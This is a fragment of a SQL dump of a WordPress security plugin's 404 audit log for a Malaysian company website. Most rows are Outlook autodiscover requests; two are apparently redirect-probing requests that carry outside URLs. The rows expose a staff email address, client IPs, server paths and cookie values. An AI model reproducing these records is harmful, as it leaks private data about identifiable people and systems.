_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8lszD-tBfd7-tNTI16wAAABg\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63672\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8lszD-tBfd7-tNTI16wAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208342.7102\";s:12:\"REQUEST_TIME\";s:10:\"1571208342\";}}','notice','2019-10-16 06:45:44','2019-10-16 06:45:43',35352392,37158456,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28117,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{21EB4BDB-CF58-42A0-874D-55254AFB4773}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8jV0LDF77y37oISr6qAAAAFA\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8jV0LDF77y37oISr6qAAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208333.2311\";s:12:\"REQUEST_TIME\";s:10:\"1571208333\";}}','notice','2019-10-16 06:45:35','2019-10-16 06:45:33',35352616,37148456,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28116,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{0EB42D61-E345-4E18-966E-8B5E9D6EA5B1}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8jF0LDF77y37oISr6pgAAAE8\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63646\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8jF0LDF77y37oISr6pgAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208332.7548\";s:12:\"REQUEST_TIME\";s:10:\"1571208332\";}}','notice','2019-10-16 06:45:34','2019-10-16 06:45:33',35352392,37158456,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28115,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{45532F9F-738E-44EC-B97B-18E53F2E2E8F}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8il0LDF77y37oISr6oAAAAEA\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63645\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8il0LDF77y37oISr6oAAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208330.6198\";s:12:\"REQUEST_TIME\";s:10:\"1571208330\";}}','notice','2019-10-16 06:45:32','2019-10-16 06:45:31',35353984,37152576,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28114,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{31CD0904-5F1E-42A3-9E7A-0337E81697FA}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8il0LDF77y37oISr6oQAAAEk\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8il0LDF77y37oISr6oQAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208330.6461\";s:12:\"REQUEST_TIME\";s:10:\"1571208330\";}}','notice','2019-10-16 06:45:32','2019-10-16 06:45:31',35352392,37158456,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28113,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{7EEE3A78-0113-4BAD-8C62-C022D91BF1BC}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8cFVwATuNyQjXQnoOPQAAAUg\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8cFVwATuNyQjXQnoOPQAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208304.6682\";s:12:\"REQUEST_TIME\";s:10:\"1571208304\";}}','notice','2019-10-16 06:45:06','2019-10-16 06:45:05',35351960,37149392,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28112,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"51732\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa6Da@51JdM-xtx2nJSIAAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571207693.1732\";s:12:\"REQUEST_TIME\";s:10:\"1571207693\";}}','notice','2019-10-16 06:34:54','2019-10-16 06:34:53',35038784,36844880,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28111,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:125:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-rooflights%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:123:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-rooflights%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"51099\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa6B10LDF77y37oISr41AAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571207687.3593\";s:12:\"REQUEST_TIME\";s:10:\"1571207687\";}}','notice','2019-10-16 06:34:49','2019-10-16 